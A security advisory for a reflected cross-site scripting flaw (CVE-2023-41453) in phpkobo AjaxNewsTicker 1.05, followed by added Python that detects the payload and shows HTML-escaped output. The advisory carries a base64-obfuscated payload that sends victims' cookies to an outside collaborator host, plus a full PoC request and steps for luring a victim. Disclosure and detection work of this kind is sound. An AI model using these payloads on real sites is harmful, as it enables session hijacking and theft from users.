CVE-2023-41453
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the cmd parameter in the index.php component.
Attack Vectors: To exploit this vulnerability the victim must click on the malicious link; the payload is then executed in the victim's browser.
Attack Type: Remote
Payload: <svg+onload=javascript:eval(atob('ZmV0Y2goJ2h0dHBzOi8vajNuNjYzbzV5bGRpbHJxc3ljeWlxMnYzY3VpbTZiLm9hc3RpZnkuY29tJywgewptZXRob2Q6ICdQT1NUJywKbW9kZTogJ25vLWNvcnMnLApib2R5OmRvY3VtZW50LmNvb2tpZQp9KTs='))>
Assigned CVE-ID: CVE-2023-41453
Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse to the following URL: https://<target.xyz>/ntic/install/index.php
2. Create your malicious payload and send the crafted malicious link to the victim so that it is executed in his/her browser.
PoC
GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22<svg+onload=javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='))>2%22%2C%22form%22%3A%7B%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%7D%22%7D HTTP/1.1
Host: target.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://target.xyz
Connection: close
Referer: http://target.xyz/ntic/install/
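The request above carries the payload inside the JSON-encoded `requ` query parameter, in its `cmd` field. The following Python is an added example, not code from the advisory or from phpkobo: it shows how a defender can decode that parameter from a request line and flag a `cmd` value that contains markup, and it contrasts the unencoded reflection the advisory implies with an HTML-encoded version. The function names, the benign sample request and the response template are assumptions made for the example; the vendor's actual PHP output code is not on the page.

```python
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Sample request lines, constructed for this example. The second one is the
# PoC request line from the advisory above; the first is a benign call with
# the same JSON structure (cmd "start" is assumed, not taken from the product).
SAMPLE_REQUEST_LINES = [
    "GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22start%22%2C%22form%22%3A%7B%7D%2C%22wdata%22%3A%22%7B%7D%22%7D HTTP/1.1",
    "GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22<svg+onload=javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='))>2%22%2C%22form%22%3A%7B%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%7D%22%7D HTTP/1.1",
]

# Markers that have no business in an installer command name.
MARKUP_PATTERNS = [
    re.compile(r"<\s*[a-zA-Z]"),           # start of an HTML tag
    re.compile(r"\bon[a-zA-Z]+\s*="),       # inline event-handler attribute
    re.compile(r"javascript\s*:", re.I),    # javascript: URL scheme
]


def extract_cmd(request_line):
    """Return the 'cmd' value carried in the requ JSON parameter, or None."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    params = parse_qs(query)  # percent-decodes and turns '+' into a space
    requ = params.get("requ")
    if not requ:
        return None
    try:
        payload = json.loads(requ[0])
    except ValueError:
        return None
    cmd = payload.get("cmd") if isinstance(payload, dict) else None
    return cmd if isinstance(cmd, str) else None


def suspicious_markers(cmd):
    """List the patterns found in cmd; an empty list means it looks benign."""
    return [p.pattern for p in MARKUP_PATTERNS if p.search(cmd)]


def scan_request_lines(lines):
    """Return (line_index, cmd, markers) for every request whose cmd carries markup."""
    hits = []
    for index, line in enumerate(lines):
        cmd = extract_cmd(line)
        if cmd is None:
            continue
        markers = suspicious_markers(cmd)
        if markers:
            hits.append((index, cmd, markers))
    return hits


def render_cmd_unsafe(cmd):
    """Vulnerable pattern (assumed response template): parameter reflected raw into HTML."""
    return "<p>Unknown command: " + cmd + "</p>"


def render_cmd_safe(cmd):
    """Fixed pattern: HTML-encode before reflecting, so '<', '>' and quotes become text."""
    return "<p>Unknown command: " + html.escape(cmd, quote=True) + "</p>"


if __name__ == "__main__":
    for index, cmd, markers in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"line {index}: suspicious cmd {cmd!r} matched {markers}")
        print("  encoded reflection:", render_cmd_safe(cmd))
```

Run as a script it prints the one flagged line from the sample set and the HTML-encoded form of its `cmd`. The detection decodes the parameter the same way the server does (percent-decoding, `+` as space, then JSON) rather than grepping the raw URL, so encoding variations of the same payload are still caught; the encoding in `render_cmd_safe` is the generic fix for a reflected value of this kind, regardless of how the vendor actually patched it.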